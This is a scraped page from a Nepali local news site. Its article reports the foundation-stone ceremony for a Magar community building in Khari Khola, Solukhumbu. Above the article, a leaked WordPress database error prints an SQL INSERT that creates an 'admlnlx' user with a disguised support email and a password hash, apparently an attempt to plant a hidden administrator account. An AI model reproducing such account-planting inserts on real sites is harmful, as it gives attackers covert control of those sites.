WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvln1pZJHjsFH9DixAU5OQDuC8uCk6.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:12:05', '', 'admlnlx', 'admlnlx')

खरिखोला मगर समाजको सामुदायिक भवनको सिलन्यास – Gaule Khabar

खरिखोला मगर समाजको सामुदायिक भवनको सिलन्यास

खरिखोला मगर समाजको सामुदायिक भवनको सिलन्यास

गाउँले न्युज, सोलुखुम्बु । खरिखोला मगर समाजको सामुदायिक भवनको सिलन्यास सम्पन्न भएको छ ।
खुम्वु पासाङ्ल्हामु गाउँपालिका वडा न १ का वडाध्यक्ष ङिमा दोर्जी शेर्पाको प्रमुख अतिथी तथा सस्थापक अध्यक्ष प्रेम बहादुर थापा र सल्लाहकार मोति प्रसाद रानामगरको उपस्थिथीमा उक्त भवनको सिलन्यास भएको हो ।

बौद्ध परम्परानुसार लामाद्वारा पुजापाठ गरि सोमबार शिलान्यास गरिएको हो । उक्त भवन निर्माणको लागि गाउँपालिकाबाट १५,००,००० बजेट बिनियोजन गरिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका